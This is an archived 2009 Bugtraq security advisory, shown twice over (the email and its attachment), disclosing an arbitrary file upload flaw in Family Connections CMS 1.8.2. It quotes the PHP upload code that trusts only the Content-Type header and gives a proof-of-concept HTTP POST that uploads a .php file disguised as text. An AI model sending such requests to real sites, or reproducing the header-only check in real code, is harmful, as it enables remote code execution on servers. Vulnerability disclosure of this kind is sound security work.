Family Connections 1.8.2 Arbitrary File Upload

From: Salvatore "drosophila" Fresta <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>,str0ke <str0ke@milw0rm.com>
Cc:
Subject: Family Connections 1.8.2 Arbitrary File Upload
Date:

Attachments:
Family Connections <= 1.8.2 Arbitrary File Upload-03042009.txt

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.

...

if (isset($_POST['submitadd'])) {
                            $doc = $_FILES['doc']['name'];
                         $desc = addslashes($_POST['desc']);
                              if ($docs->uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
                                      
...

function uploadDocument ($filetype, $filename, $filetmpname) {
           global $LANG;
              $known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl',
'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
                 'application/x-compressed' => 'zip', 'application/x-zip-compressed'
=> 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
'application/rtf' => 'rtf',
                     'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
                     'application/x-mspowerpoint' => 'ppt', 'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
         if (!array_key_exists($filetype, $known_photo_types)) {
                    echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
                 return false;
              } else {
                   copy($filetmpname, "gallery/documents/$filename");
                       return true;
               }
  }
  
...


*************************************************

[+] Code


- [A] Arbitrary File Upload

The following is an example of a malicious package:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary 
files on the system. This is possible because there 
aren't controls on file extension but on the 
Content-Type header only, that can be changed easily.

...

if (isset($_POST['submitadd'])) {
                             $doc = $_FILES['doc']['name'];
                         $desc = addslashes($_POST['desc']);
                              if ($docs->uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
                                  
...

function uploadDocument ($filetype, $filename, $filetmpname) {
           global $LANG;
              $known_photo_types = array('application/msword' => 'doc', 'text/plain' => 'txt', 'application/excel' => 'xsl', 'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl', 
                        'application/x-compressed' => 'zip', 'application/x-zip-compressed' => 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip', 'application/rtf' => 'rtf', 
                    'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf', 'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt', 'application/vnd.ms-powerpoint' => 'ppt', 
                    'application/x-mspowerpoint' => 'ppt', 'application/x-excel' => 'xsl', 'application/pdf' => 'pdf');
             if (!array_key_exists($filetype, $known_photo_types)) {
                    echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
                     return false;
              } else {
                   copy($filetmpname, "gallery/documents/$filename");
                       return true;
               }
  }
  
...


*************************************************

[+] Code


- [A] Arbitrary File Upload

The following is an example of a malicious package:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n


*************************************************

[+] Fix

No fix.


*************************************************



Copyright © 1995-2019 LinuxRocket.net. All rights reserved.